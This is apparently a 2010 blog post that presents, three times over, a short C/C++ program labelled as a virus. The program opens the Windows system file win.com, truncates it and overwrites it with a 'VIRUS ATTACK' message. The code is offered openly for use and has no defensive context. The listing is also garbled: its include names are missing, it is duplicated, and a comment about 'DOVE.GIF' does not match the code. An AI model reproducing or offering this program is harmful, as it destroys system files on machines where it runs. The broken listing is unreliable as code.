Sunday, January 24, 2010

Virus that currupt your Windows

#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

//#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

// #include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

No comments: